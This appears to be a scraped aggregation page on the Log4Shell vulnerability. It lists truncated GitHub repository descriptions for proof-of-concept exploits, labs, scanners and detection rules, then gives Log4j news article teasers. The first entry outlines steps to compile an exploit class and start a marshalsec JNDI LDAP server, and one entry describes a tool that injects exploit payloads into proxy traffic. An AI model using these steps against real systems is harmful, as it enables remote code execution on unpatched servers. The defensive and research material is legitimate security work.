CVE-2021-44228(Apache Log4j Remote Code Execution) Affected versions < 2150 Useage: git clone githubcom/tangxiaofeng7/apache-log4j-pocgit cd apache-log4j-poc/src/main/java javac Exploitjava python -m SimpleHTTPServer 8888 cd tools java -cp marshalsec-003-SNAPSHOT-alljar marshalsecjndiLDAPRefServer "http

log4j-log4shell-affected Lists of affected components and affected apps/vendors by CVE-2021-44228 (aka Log4shell or Log4j RCE) for security responders

log4j-snort log4j漏洞(CVE-2021-44228)snort检测规则,详见snorttxt

horrors-log4shell A micro lab (playground?) for CVE-2021-44228 (log4j) Don't expect the full attack chain to work out of box Requirements Kali Linux # apt install default-jdk gradle maven macOS % brew install openjdk gradle maven Installation % git clone githubcom/tasooshi/horrorsgi

Apache Log4j 2 arbitrary code execution(CVE-2021-44228) Apache Log4j 2 任意コード実行脆弱性(CVE-2021-44228) just for code searching 研究用です don't use to attack 本脆弱性を悪用する攻撃をしないでください

Overview This repository contains OpenIOC rules to facilitate hunting for indicators of compromise related to the Apache Log4j remote code execution vulnerability (CVE-2021-44228) These rules are considered hunting rules as detection efficacy will vary by organization With environment-specific tuning these rules may be suitable for deployment as alerting rules FireEye custom

CVE-2021-44228 nvdnistgov/vuln/detail/CVE-2021-44228 log4jjava - modification of [this PoC] (githubcom/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce) to run a bunch of payloads from JNDIExploit jndipcap - a PCAP of each of these payloads being ran snortrules - Snort rules to detect the LDAP and HTTP connections Pull requests to make the HTTP ones work a

cve-2021-44228-log4j-mitigation Mitigate against log4j vulnerability

log4j-poc Log4Shell CVE-2021-44228

CVE-2021-44228

Vendia's Blog Welcome to the Vendia blog repo! Contributions, typo fixes and pull requests are welcome Table of Contents Click to expand Vendia's Blog Posts Authors How to contribute content TDLR; 1 Write your content in markdown! 2 Name your post file name 3 In your post, include post meta information: 4 Add your author bio 5 Submit a PR to the repository

FROST-Server A Server implementation of the OGC SensorThings API The FRaunhofer Opensource SensorThings-Server is the first complete, open-source implementation of the OGC SensorThings API Part 1: Sensing It now also includes preliminary actuation support FROST & the Log4J2 Log4Shell vulnerability FROST-Server is not vulnerable to the Log4J2 zero day vuln

Per CVE-2021-44228, Apache log4j2 versions < 2150 are vulnerable to remote code execution and data exfiltration This script will scan your New Relic account(s) for java services that report usage of log4j-core, and generate a manifest containing each suspect service with the version of log4j-core reported by New Relic APM Note that this script may generate false posi

LDAP OOB Server 用来验证 JNDI LDAP 注入 CVE-2021-44228: Log4j2 remote code exec Usage 启动 java -jar ldap-oobjar API 获取标识id:GET 127001:8080/ldap/register -> id 判断标识id是否被ldap触发 GET 127001:8080/ldap/{id}/access -> boolean 删除标识id: POSTS 127001:8080/ldap/{id}/unregister LDAP ldap://12700

Log4J_Version_Checker The purpose of this tool is to allow the user to check the version of Log4J installed on their machine I created this utility in response to CVE-2021-44228 to help my IT department to find the version number once we identified machines with the JAR located on it It's a pretty simple script that uses the following syntax: python Log4J_Version_Checke

log4j2-CVE-2021-44228-poc-local Just a personal proof of concept of CVE-2021-44228 on log4j2

Log4JShell Bytecode Detector This repository contains a tool to detect if a jar file is affected by the critical CVE-2021-44228 The tool scans the jar file and compares the classses against a set of vulnerable hashes for classes within the jar file The hashes have been pre-computed for artifacts on Maven Central How to run this tool Download the jar file under releases Run

sample-vulnerable-log4j-direct-lib A library that has a direct dependency on a vulnerable log4j version (CVE-2021-44228) This library is used by githubcom/sgtest/sample-vulnerable-log4j-indirect-app Related repositories The following repositories are used to demonstrate Sourcegraph functionality related to fixing CVE-2021-44228: githubcom/sgtest/sample-vuln

log4j-detector Detects log4j versions on your file-system, including deeply recursively nested copies (jars inside jars inside jars) Works on Linux, Windows, and Mac, and everywhere else Java runs, too! Example usage: java -jar log4j-detector-20211213jar [path-to-scan] > hitstxt Caveats It currently skips directories / files that current user does not have permiss

Log4J lab Description This is a lab for playing around with the Log4J CVE-2021-44228 Springboot app + Log4J 261 Usage /gradlew bootRun

This is a simple fork of James Kettle's excellent Collaborator Everywhere, with the injection parameters changed to payloads for the critical log4j CVE-2021-44228 vulnerability This extension only works on in-scope traffic, and works by injecting headers into your proxy traffic with log4j exploits To avoid false positives with pingbacks such as with DNS requests made fro

This is a simple fork of James Kettle's excellent Collaborator Everywhere, with the injection parameters changed to payloads for the critical log4j CVE-2021-44228 vulnerability This extension only works on in-scope traffic, and works by injecting headers into your proxy traffic with log4j exploits To avoid false positives with pingbacks such as with DNS requests made fro

Log4j-CVE-2021-44228 Mass Check Vulnerable Log4j CVE-2021-44228 Introduction Actually I just checked via Vulnerable Application from [githubcom/christophetd/log4shell-vulnerable-app] (because I'm lazy to find live target xD) so you can develop or change this code according to your knowledge ;) Requirements python 3x pip Installation pip install -r requirements

Mulgara Semantic Store (Mulgara) Installation Guide Table of Contents Introduction Directory Layout Release Notes Installing Java Building Mulgara Building Mulgara in Eclipse Running a Mulgara Server Mulgara Server Options License Note about log4j On 2021-12-10 CERT NZ issued an advisory that CVE-2021-44228 was being actively exploited This means that JNDI lookup

j4shell_ioc_ips big dump from known j4log/j4shell malicious ip adresses unique and sorted updated every 10 minutes! sources: gistgithubcom/gnremy/c546c7911d5f876f263309d7161a7217 githubcom/Akikazuu/Apache-Log4j-RCE-Attempt githubcom/RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs gistgithubcom/ycamper/26e021a2b5974049d113738d51e764

Log4j Detection You can use this YARA rule to detect the presence of Log4j and then determine whether it is vulnerable to Log4Shell (CVE-2021-44228) or not If it is, then you can use mitigations listed below to handle this situation In the Package folder you can find a collected package which includes YARA executable, the rule file (log4jyar), and cmd\bash scripts for runnin

Log4j Scans githubcom/fullhunt/log4j-scan log4shellhuntresscom/ wwwcyberdraincom/monitoring-with-powershell-detecting-log4j-files/ researchnccgroupcom/2021/12/12/log4shell-reconnaissance-and-post-exploitation-network-detection/ githubcom/hillu/local-log4j-vuln-scanner githubcom/omrsafetyo/PowerShellSnippets/blob/master/In

log4j-scan A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts Features Support for lists of URLs Fuzzing for more than 60 HTTP request headers (not only 3-4 headers as previously seen tools) Fuzzing for HTTP POST Data parameters Fuzzing for JSON data parameters Supports DNS callback for vulnerability discovery and validation WAF Bypass

Hi , I'm Daniel Quadros An old-timer developer from Brazil I’m currently working on ATmega Detonator I’m currently learning Spring, SpringBoot and Angular (long story why) All of my projects are available at githubcom/dquadros I regulary write articles on dqsoftblogspotcom How to reach me dqsoftblogspot@gmailcom Know about

Log4Find Log4Find is a simple scanning tool to detect vulnerable and/or compromised systems to Log4Shell vulnerability (CVE-2021-44228) Usage There are two binaries : one for Linux systems and another one for Windows systems Please refer to the doc in the proper folders "windows" and "linux" inside this project for more information Detection logic The ma

Minzomat Minzomat makes your server aminzing™ by adding the following stuff: Write your own embeds / Allows you to send an embed just like a normal message Quote messages / Allows you to show what another user wrote some time ago inside an embed Large reactions [WIP] React on a message with the :minzomat: emoji and the bot will display all reactions in one lar

orgshanekingdemocvey2021s44228 CVE-2021-44228

Security-Log4J-Tester The vulnerability, which can allow an attacker to execute arbitrary code by sending crafted log messages, has been identified as CVE-2021-44228 and given the name Log4Shell

DICOM+ for: anonymizing DICOM files viewing DICOM files as either images or the meta-data as text editing DICOM files uploading DICOM files to a PACS Note: This software is not vulnerable to the log4j exploit CVE-2021-44228 Licensed under the Apache License, Version 20 Developer: Jim Irrer irrer@umichedu Download latest pre-built package Latest release: 07-Dec-2020 To Ru

log4j2-scan is a single binary command-line tool for CVE-2021-44228 vulnerability scanning and mitigation patch It also supports nested JAR file scanning and patch Download log4j2-scan 131 (Windows x64) If native executable doesn't work, use the JAR instead 32bit is not supported log4j2-scan 131 (Linux x64) If native executable doesn't work, use the JAR i

log4jail A fast firewall reverse proxy with TLS (HTTPS) and swarm support for preventing Log4J (Log4Shell aka CVE-2021-44228) attacks Table of Contents Introduction Installation Quick Start Proof of Concept For Pentesters Introduction log4jail is a quick and dirty solution to block Log4Shell exploit attempts by acting as a reverse proxy scanning complete request body incl

log4j-elasticbeanstalk-remove Scripts to remove unused log4jjar from AWS Elastic Beanstalk Tomcat images and mitigate CVE-2021-44228 Log4Shell attacks The issue CVE-2021-44228 is a serious security issue for users of Log4j This applies to any Java application that is actively using log4j-impljar Many Java applications contain or use log4j-apijar, which only contain the A

log4shelldetect Scans a file or folder recursively for jar files that may be vulnerable to Log4Shell (CVE-2021-44228) by inspecting the class paths inside the jar If you only want possibly vulnerable jars to be printed rather than all jars, run with -mode list License Code here is released to the public domain under unlicense With the exception of velocity-119jar which is

CVE-2021-44228_scanner Scanners for Jar files that may be vulnerable to CVE-2021-44228

log4j-honeypot-flask Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228 This can be installed on a workstation or server, either by running the Python app/apppy script directly (you'll need python3, Flask, and Requests) or as a Docker container You will need to set some environment variables (or hard-code

Java Settlers A desktop client-server version of Settlers of Catan Introduction JSettlers is a Java version of the board game Settlers of Catan written in Java This client-server system supports multiple simultaneous games between people and computer-controlled opponents Initially created as an AI research project The client can host a server, connect to dedicated JSettlers

log4j-cve Apache Log4j Zero Day Vulnerability aka Log4Shell aka CVE-2021-44228

Get-log4j-Windowsps1 Identifying all log4j components across all windows servers, entire domain, can be multi domain CVE-2021-44228 ##################################################################################### Get-log4j-Windows-v1ps1 Author: Keith Waterman Date : 15-Dec-2021 Description: Made for CVE-2021-44228 Searches AD for all Computer objects with filter (M

Recent Articles

Log4j Vulnerabilities: Attack Insights
Symantec Threat Intelligence Blog • Siddhesh Chandrayan • 23 Dec 2022

Symantec data shows variation and scope of attacks.

Posted: 23 Dec, 20214 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinLog4j Vulnerabilities: Attack InsightsSymantec data shows variation and scope of attacks.Apache Log4j is a Java-based logging utility. The library’s main role is to log information related to security and performance to make error debugging easier and to enable applications to run smoothly. The library is part of the Apache Logging Services, a project of the A...

Apache Log4j Zero-Day Being Exploited in the Wild
Symantec Threat Intelligence Blog • Threat Hunter Team • 11 Dec 2022

Symantec products will protect against attempted exploits of critical CVE-2021-44228 vulnerability

Posted: 11 Dec, 20211 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinApache Log4j Zero-Day Being Exploited in the WildSymantec products will protect against attempted exploits of critical CVE-2021-44228 vulnerability A zero-day vulnerability (CVE-2021-44228) has been discovered in Apache Log4j which, if exploited, could permit a remote attacker to execute arbitrary code on vulnerable systems. Exploit code for this vulnerability, ...

Ransomware: How Attackers are Breaching Corporate Networks
Symantec Threat Intelligence Blog • Karthikeyan C Kasiviswanathan Vishal Kamble • 28 Apr 2022

Latest tools, tactics, and procedures being used by the Hive, Conti, and AvosLocker ransomware operations.

Posted: 28 Apr, 20228 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinRansomware: How Attackers are Breaching Corporate NetworksLatest tools, tactics, and procedures being used by the Hive, Conti, and AvosLocker ransomware operations.Targeted ransomware attacks continue to be one of the most critical cyber risks facing organizations of all sizes. The tactics used by ransomware attackers are continually evolving, but by identifying the most freq...

Stonefly: North Korea-linked Spying Operation Continues to Hit High-value Targets
Symantec Threat Intelligence Blog • Threat Hunter Team • 27 Apr 2022

Espionage group focuses on obtaining classified or sensitive intellectual property that has civilian and military applications.

Posted: 27 Apr, 20225 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinStonefly: North Korea-linked Spying Operation Continues to Hit High-value TargetsEspionage group focuses on obtaining classified or sensitive intellectual property that has civilian and military applications.The North Korean-linked Stonefly group is continuing to mount espionage attacks against highly specialized engineering companies with a likely goal of obtaining sensitive...

Public interest in Log4Shell fades but attack surface remains
BleepingComputer • Bill Toulas • 26 Apr 2022

It’s been four months since Log4Shell, a critical zero-day vulnerability in the ubiquitous Apache Log4j library, was discovered, and threat analysts warn that the application of the available fixes is still way behind.
Although the public interest and focus of the infosec community have moved to newer vulnerabilities and exploits,
continues to be a large-scale problem and a grave security risk.
The last time we touched the subject of Log4Shell exploitation was roughly two m...

Mirai malware now delivered using Spring4Shell exploits
BleepingComputer • Bill Toulas • 08 Apr 2022

The Mirai malware is now leveraging the Spring4Shell exploit to infect vulnerable web servers and recruit them for DDoS (distributed denial of service) attacks.
Spring4Shell is a
tracked as CVE-2022-22965, affecting Spring Framework, a widely used enterprise-level Java app development platform.
Spring released emergency updates to 
 a few days after its discovery, but threat actors' exploitation of vulnerable deployments was already underway.
While&...

APT41 Spies Broke Into 6 US State Networks via a Livestock App
Threatpost • Lisa Vaas • 09 Mar 2022

USAHerds – an app used (PDF) by farmers to speed their response to diseases and other threats to their livestock – has itself become an infection vector, used to pry open at least six U.S. state networks by one of China’s most prolific state-sponsored espionage groups.
In a report published by Mandiant on Tuesday, researchers described a prolonged incursion conducted by APT41. They detected the activity in May 2021 and tracked it through last month, February 2022, observing the spy g...

NHS urges orgs to apply security update for Okta Client RCE bug
BleepingComputer • Bill Toulas • 25 Feb 2022

The UK's NHS Digital agency is warning organizations to apply new security updates for a remote code execution vulnerability in the Windows client for the Okta Advanced Server Access authentication management platform.
"NHS Digital is the national digital, data and technology delivery partner for the NHS and social care system," explains 
 for NHS Digital.
In an
released yesterday, all organizations are advised to apply the latest patches for the Okta Advanced...

‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet
Threatpost • John Hammond • 04 Feb 2022

Jen Easterly, the director of the Cybersecurity and Infrastructure Security Agency (CISA), stated in a public news interview that the now-infamous Log4j flaw is the “the most serious vulnerability that [she has] seen in her career.” It’s not a stretch to say the whole security industry would agree.
December of 2021 will be looked back on with a tinge of trauma and dread for incident responders, system administrators and security practitioners. You all probably already know— on Dece...

Dutch cybersecurity agency warns of lingering Log4j risks
BleepingComputer • Sergiu Gatlan • 22 Jan 2022

In a warning issued on Thursday, the Dutch National Cybersecurity Centre (NCSC) says organizations should still be aware of risks connected to Log4j attacks and remain vigilant for ongoing threats.
Even though the aftermath of recent incidents connected to Log4Shell exploitation was "not too bad" because many organizations have acted quickly to mitigate these critical vulnerabilities, the NCSC says that threat actors are most likely still planning to breach new targets. 
"It is ex...

Microsoft: Attackers Tried to Login to SolarWinds Serv-U Via Log4j Bug
Threatpost • Lisa Vaas • 20 Jan 2022

Attackers are trying to log in to SolarWinds Serv-U file-sharing software via attacks exploiting the Log4j  flaws.
This is a confusing story: Initially,  Microsoft had warned on Wednesday that attackers were exploiting a previously undisclosed vulnerability in the SolarWinds Serv-U file-sharing software to propagate Log4j attacks against networks’ internal devices via the SolarWinds bug.
SolarWinds had issued a fix the day before, on Tuesday.
SolarWinds subsequently reached...

The Threat Landscape in 2021
Symantec Threat Intelligence Blog • Threat Hunter Team • 19 Jan 2022

Symantec takes a look at the cyber security trends that shaped the year

Posted: 19 Jan, 20226 Min ReadThreat Intelligence SubscribeFollowtwitterlinkedinThe Threat Landscape in 2021Symantec takes a look at the cyber security trends that shaped the yearFrom the evolving ransomware ecosystem to attacks against critical infrastructure, Symantec looks back over the cyber-security trends that shaped 2021.

A new whitepaper from Symantec, a division of Broadcom Software, takes a look back at the some of t...

The Log4j Vulnerability Puts Pressure on the Security World
Threatpost • Saryu Nayyar • 18 Jan 2022

It’s not my intention to be alarmist about the Log4j vulnerability (CVE-2021-44228), known as Log4Shell, but this one is pretty bad.
First of all, Log4j is a ubiquitous logging library that is very widely used by millions of computers. Second, the director of the U.S. Cybersecurity & Infrastructure Security Agency (CISA) says this is the most serious vulnerability she has ever seen in her career spanning decades, and many security experts agree. Third, researchers say that cyberatta...

The Week in Ransomware - January 14th 2022 - Russia finally takes action
BleepingComputer • Lawrence Abrams • 14 Jan 2022

Today, the Russian government announced that they
on behalf of US authorities.
While the ransomware gang members are only being charged with "illegal circulation of means of payment," the arrests are the first public action by Russia to stem the activities of ransomware gangs operating within the country.
Furthermore, Russia states that they took this action on behalf of US law enforcement, who they have historically been reluctant to help in criminal cybercrime investigation...

Night Sky ransomware uses Log4j bug to hack VMware Horizon servers
BleepingComputer • Ionut Ilascu • 11 Jan 2022

The Night Sky ransomware gang has started to exploit the critical CVE-2021-44228 vulnerability in the Log4j logging library, also known as Log4Shell, to gain access to VMware Horizon systems.
The threat actor is targeting vulnerable machines exposed on the public web from domains that impersonate legitimate companies, some of them in the technology and cybersecurity sectors.
Spotted in late December 2021 by security researcher MalwareHunterTeam,
. It has encrypted multiple vic...

Four million outdated Log4j downloads were served from Apache Maven Central alone despite vuln publicity blitz
The Register • Gareth Corfield • 11 Jan 2022

Get our weekly newsletter It's not as though folks haven't been warned about this

There have been millions of downloads of outdated, vulnerable Log4j versions despite the emergence of a serious security hole in December 2021, according to figures compiled by the firm that runs Apache Maven's Central Repository.
That company, Sonatype, said it had seen four million downloads of exploitable Log4j versions from the repository alone between 10 December and the present day, out of a total of more than 10 million downloads over those past four weeks.
Tracked as CVE-2021...

NHS warns of hackers exploiting Log4Shell in VMware Horizon
BleepingComputer • Bill Toulas • 07 Jan 2022

UK's National Health Service (NHS) has published a cyber alert warning of an unknown threat group targeting VMware Horizon deployments with Log4Shell exploits.
Log4Shell is an exploit for
, a critical arbitrary remote code execution flaw in the Apache Log4j 2.14, which has been under active and
since December 2021.
Apache addressed the above and four more vulnerabilities via subsequent security updates, and
is now considered adequately secure.
According t...

FTC to Go After Companies that Ignore Log4j
Threatpost • Lisa Vaas • 05 Jan 2022

The Federal Trade Commission (FTC) will muster its legal muscle to pursue companies and vendors that fail to protect consumer data from the risks of the Log4j vulnerabilities, it warned on Tuesday.
“The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future,” according to the warning.
Those companies that bungle consumer d...

You better have patched those Log4j holes or we'll see what a judge has to say – FTC
The Register • Thomas Claburn in San Francisco • 05 Jan 2022

Get our weekly newsletter Apply fixes responsibly in a timely manner or face the wrath of Lina Khan

The US Federal Trade Commission on Tuesday warned companies that vulnerable Log4j software needs to be patched … or else.
In case any system administrators last month somehow missed the widespread alarm over vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832) in the Java logging package, the trade watchdog said Log4j continues to be exploited by a growing number of attackers and urged organizations to act now before it's too late.
The FTC is advising companies to consu...

Microsoft Sees Rampant Log4j Exploit Attempts, Testing
Threatpost • Lisa Vaas • 04 Jan 2022

No surprise here: The holidays bought no Log4Shell relief.
Threat actors vigorously launched exploit attempts and testing during the last weeks of December, Microsoft said on Monday, in the latest update to its landing page and guidance around the flaws in Apache’s Log4j logging library.
“We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks,” according to Micro...

APT ‘Aquatic Panda’ Targets Universities with Log4Shell Exploit Tools
Threatpost • Elizabeth Montalbano • 30 Dec 2021

Cyber criminals, under the moniker Aquatic Panda, are the latest advanced persistent threat group (APT) to exploit the Log4Shell vulnerability.
Researchers from CrowdStrike Falcon OverWatch recently disrupted the threat actors using Log4Shell exploit tools on a vulnerable VMware installation during an attack that involved of a large undisclosed academic institution, according to research released Wednesday.
“Aquatic Panda is a China-based [APT] with a dual mission of intelligence c...

Fintech firm hit by log4j hack refuses to pay $5 million ransom
BleepingComputer • Ax Sharma • 29 Dec 2021

One of the largest Vietnamese crypto trading platforms, ONUS, recently suffered a cyber attack on its payment system running a vulnerable Log4j version.
Soon enough, threat actors approached ONUS to extort a $5 million sum and threatened to publish the customer data should ONUS refuse to comply.
After the company's refusal to pay the ransom, threat actors put up data of nearly 2 million ONUS customers for sale on forums.
On December 9th, the
for the notorious

Log4j 2.17.1 out now, fixes new remote code execution bug
BleepingComputer • Ax Sharma • 28 Dec 2021

Apache has released another Log4j version, 2.17.1 fixing a newly discovered remote code execution (RCE) vulnerability in 2.17.0, tracked as CVE-2021-44832.
Prior to today, 2.17.0 was the most recent version of Log4j and deemed the safest release to upgrade to, but that advice has now evolved.
Mass exploitation of the original
(CVE-2021-44228) by threat actors began around December 9th, when a
 for it surfaced on GitHub.
Given Log4j's vast usage in the majority...

The 5 Most-Wanted Threatpost Stories of 2021
Threatpost • Tara Seals • 27 Dec 2021

As 2021 draws to a close, and the COVID-19 pandemic drags on, it’s time to take stock of what resonated with our 1 million+ monthly visitors this year, with an eye to summing up some hot trends (gleaned from looking at the most-read stories on the Threatpost site).
While 2020 was all about work-from-home security, COVID-19-themed social engineering and gaming (all driven by social changes during Year One of the pandemic), 2021 saw a distinctive shift in interest. Data insecurity, code-re...

‘Hack DHS’ bug bounty program expands to Log4j security flaws
BleepingComputer • Sergiu Gatlan • 22 Dec 2021

The Department of Homeland Security (DHS) has announced that the 'Hack DHS' program is now also open to bug bounty hunters willing to track down DHS systems impacted by Log4j vulnerabilities.
"In response to the recently discovered log4j vulnerabilities, @DHSgov  is expanding the scope of our new #HackDHS bug bounty program and including additional incentives to find and patch log4j-related vulnerabilities in our systems," 
DHS Secretary Alejandro N. Mayorkas.
"In partnersh...

Third Log4J Bug Can Trigger DoS; Apache Issues Patch
Threatpost • Lisa Vaas • 20 Dec 2021

No, you’re not seeing triple: On Friday, Apache released yet another patch – version 2.17 – for yet another flaw in the ubiquitous log4j logging library, this time for a DoS bug.
Trouble comes in threes, and this is the third one for log4j. The latest bug isn’t a variant of the Log4Shell remote-code execution (RCE) bug that’s plagued IT teams since Dec. 10, coming under active attack worldwide within hours of its public disclosure, spawning even nastier mutations and leading to t...

Bad things come in threes: Apache reveals another Log4J bug
The Register • Simon Sharwood, APAC Editor • 19 Dec 2021

Get our weekly newsletter Third major fix in ten days is an infinite recursion flaw rated 7.5/10

The Apache Software Foundation (ASF) has revealed a third bug in its Log4 Java-based open-source logging library Log4j.
CVE-2021-45105 is a 7.5/10-rated infinite recursion bug that was present in Log4j2 versions 2.0-alpha1 through 2.16.0. The fix is version 2.17.0 of Log4j.
That’s the third new version of the tool in the last ten days.
In case you haven’t been paying attention, version 2.15.0 was created to fix CVE-2021-44228, the critical-rated and trivial-to-exploit remot...

TellYouThePass ransomware revived in Linux, Windows Log4j attacks
BleepingComputer • Sergiu Gatlan • 17 Dec 2021

Threat actors have revived an old and relatively inactive ransomware family known as TellYouThePass, deploying it in attacks against Windows and Linux devices targeting a critical remote code execution bug in the Apache Log4j library.
KnownSec 404 Team's Heige first reported these attacks 
on Monday after observing that the ransomware was dropped on old Windows systems using exploits abusing the flaw tracked as CVE-2021-44228 and known as
.
Heige's report was confir...

CISA issues emergency directive to fix Log4j vulnerability
The Register • Thomas Claburn in San Francisco • 17 Dec 2021

Get our weekly newsletter Federal agencies have a week to get their systems patched

The US government's Cybersecurity and Infrastructure Security Agency (CISA) on Friday escalated its call to fix the Apache Log4j vulnerability with an emergency directive requiring federal agencies to take corrective action by 5 pm EST on December 23, 2021.
Log4j is a Java-based open source logging library used in millions of applications. Versions up to and including 2.14.1 contain a critical remote code execution flaw (CVE-2021-44228), and the fix incorporated into version 2.15, released...

Log4j attackers switch to injecting Monero miners via RMI
BleepingComputer • Bill Toulas • 16 Dec 2021

Some threat actors exploiting the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI or even used both in a single request for maximum chances of success.
This shift is a notable development in the ongoing attack and one that defenders need to be aware of when trying to secure all potential vectors.
For now, this trend was observed by threat actors looking to hijack resources for Monero mining, but others could adopt it at any time.
Most attacks targeting t...

Microsoft: Khonsari ransomware hits self-hosted Minecraft servers
BleepingComputer • Sergiu Gatlan • 16 Dec 2021

Microsoft urges admins of self-hosted Minecraft servers to upgrade to the latest release to defend against Khonsari ransomware attacks exploiting the critical Log4Shell security vulnerability.
Mojang Studios, the Swedish video game developer behind Minecraft,
last week to address the bug tracked as 
 in the Apache Log4j Java logging library(used by the game's Java Edition client and multiplayer servers).
While there was no mention of attacks targeting Minecraft serv...

Relentless Log4j Attacks Include State Actors, Possible Worm
Threatpost • Becky Bracken • 15 Dec 2021

Call it a “logjam” of threats: Attackers including nation-state actors have already targeted half of all corporate global networks in security companies’ telemetry using at least 70 distinct malware families — and the fallout from the Log4j vulnerability is just beginning.
Researchers manning keyboards all over the world have spent the past several days chasing attacks aimed at a now-infamous Log4j Java library bug, dubbed Log4Shell (CVE-2021-44228). Side note: Log4j is pronounced,...

SAP Kicks Log4Shell Vulnerability Out of 20 Apps
Threatpost • Lisa Vaas • 15 Dec 2021

SAP has identified 32 apps that are affected by CVE-2021-44228 – the critical vulnerability in the Apache Log4j Java-based logging library that’s been under active attack since last week.
As of yesterday, Patch Tuesday, the German software maker reported that it’s already patched 20 of those apps, and it’s still feverishly working on fixes for 12. SAP provided workarounds for some of the pending patches in this document, accessible to users on the company’s support portal.
...

Apache’s Fix for Log4Shell Can Lead to DoS Attacks
Threatpost • Elizabeth Montalbano • 15 Dec 2021

As if finding one easily exploited and extremely dangerous flaw in the ubiquitous Java logging library Apache Log4j hadn’t already turned the Internet security community on its ear, researchers now have found a new vulnerability in Apache’s patch issued to mitigate it.
Last Thursday security researchers began warning that a vulnerability tracked as CVE-2021-44228 in Apache Log4j was under active attack and had the potential, according to many reports, to break the internet. Dubbed Log4...

As CISA tells US govt agencies to squash Log4j bug by Dec 24, fingers start pointing at China, Iran, others
The Register • Chris Williams, Editor in Chief • 15 Dec 2021

Get our weekly newsletter Microsoft says cyber-spies linked to Beijing, Tehran are getting busy with security flaw along with world + dog Log4j doesn't just blow a hole in your servers, it's reopening that can of worms: Is Big Biz exploiting open source?

Microsoft reckons government cyber-spies in China, Iran, North Korea, and Turkey are actively exploiting the Log4j 2.x remote-code execution hole.
Up until now, it was largely accepted that mere private miscreants, criminal gangs, and security researchers were mostly scanning the internet for systems and services vulnerable to CVE-2021-44228 in the open-source logging library widely used by Java applications. Network observers say they've seen tens of thousands of attempts per minute. Succ...

Log4j vulnerability now used by state-backed hackers, access brokers
BleepingComputer • Ionut Ilascu • 15 Dec 2021

As expected, nation-state hackers of all kinds have jumped at the opportunity to exploit the recently disclosed critical vulnerability (CVE-2021-44228) in the Apache Log4j Java-based logging library.
Also known as Log4Shell or LogJam, the vulnerability is now being used by threat actors linked to governments in China, Iran, North Korea, and Turkey, as well as access brokers used by ransomware gangs.
Among the first threat actors to leverage Log4Shell to drop payloads are cryptocurren...

What the Log4Shell Bug Means for SMBs: Experts Weigh In
Threatpost • Tara Seals • 14 Dec 2021

News of the Log4Shell vulnerability is everywhere, with security experts variously calling the Apache log4j logging library bug a recipe for an “internet meltdown,” as well as the “worst cybersecurity bug of the year.” Names like “Apple,” “Twitter” and “Cloudflare” are being bandied about as being vulnerable, but what does the issue mean for small- and medium-sized businesses?
We asked security experts to weigh in on the specific effects (and advice/remedies) for SMBs i...

Apache takes off, nukes insecure feature at the heart of Log4j from orbit with v2.16
The Register • Gareth Corfield • 14 Dec 2021

Get our weekly newsletter Now open-source logging library's JNDI disabled entirely by default, message lookups removed

Last week, version 2.15 of the widely used open-source logging library Log4j was released to tackle a critical security hole, dubbed Log4Shell, which could be trivially abused by miscreants to hijack servers and apps over the internet.
However, that release only partially closed the hole (CVE-2021-44228) by disabling by default one aspect of the Java library's exploitable functionality – JNDI message lookups. Now version 2.16 is out, and it disables all of JNDI support by default, and re...

Apache takes off, nukes insecure feature at the heart of Log4j from orbit with v2.16
The Register • Gareth Corfield • 14 Dec 2021

Get our weekly newsletter Now open-source logging library's JNDI disabled entirely by default, message lookups removed

Last week, version 2.15 of the widely used open-source logging library Log4j was released to tackle a critical security hole, dubbed Log4Shell, which could be trivially abused by miscreants to hijack servers and apps over the internet.
However, that release only partially closed the hole (CVE-2021-44228) by disabling by default one aspect of the Java library's exploitable functionality – JNDI message lookups. Now version 2.16 is out, and it disables all of JNDI support by default, and re...

Popular password manager LastPass to be spun out from LogMeIn
The Register • Jude Karabus • 14 Dec 2021

Get our weekly newsletter Private equity owners play pass the parcel

One of the biggest beasts in the password management world, LastPass, is being spun out from parent LogMeIn as a "standalone cloud security" organisation.
"The success we've seen across the entire LogMeIn portfolio over the last 18 months proves there is a vast growth opportunity ahead for both LastPass and LogMeIn," said Andrew Kowal, a partner at Francisco Partners.
Francisco Partners, a private equity business, bought the bundle of remote access, collab and password manager tools ...

Log4Shell vulnerability: What we know so far
welivesecurity • 13 Dec 2021

Just as the holiday season is approaching our doorstep, a critical vulnerability in an Apache code library called Log4j 2 has come knocking at the door. Log4j is an open-source Java-based logging library that is widely used by many products, services and Java components. It’s little surprise that the flaw, which scored a perfect 10 on the CVSS scale and is putting countless servers at risk of complete takeover, has sent shockwaves far beyond the security industry.
Indeed, with proof of c...

Where the Latest Log4Shell Attacks Are Coming From
Threatpost • Becky Bracken • 13 Dec 2021

Cybersecurity professionals across the world have been scrambling to shore up their systems against a critical remote code-execution (RCE) flaw (CVE-2021-44228) in the Apache Log4j tool, discovered just days ago.
Now under active exploit, the “Log4Shell” bug allows complete server takeover. Researchers have started to fill in the details on the latest Log4Shell attacks, and they reported finding at least 10 specific Linux botnets leading the charge.

First, analysts at Net...

Log4Shell Is Spawning Even Nastier Mutations
Threatpost • Lisa Vaas • 13 Dec 2021

The internet has a fast-spreading, malignant cancer – otherwise known as the Apache Log4j logging library exploit – that’s been rapidly mutating and attracting swarms of attackers since it was publicly disclosed last week.
Most of the attacks focus on cryptocurrency mining done on victims’ dimes, as seen by Sophos, Microsoft and other security firms. However, attackers are actively trying to install far more dangerous malware on vulnerable systems as well.
According to Micros...

Log4j RCE latest: In case you hadn't noticed, this is Really Very Bad, exploited in the wild, needs urgent patching
The Register • Gareth Corfield • 13 Dec 2021

Get our weekly newsletter This might be the bug that deserves the website, logo and book deal

Miscreants are wasting no time in using the widespread Log4j vulnerability to compromise systems, with waves and waves of live exploit attempts focused mainly – for now – on turning infected devices into cryptocurrency-mining botnet drones.
Israel's Check Point said this morning it was seeing around 100 exploit attempts every minute, going into further detail in a blog post.
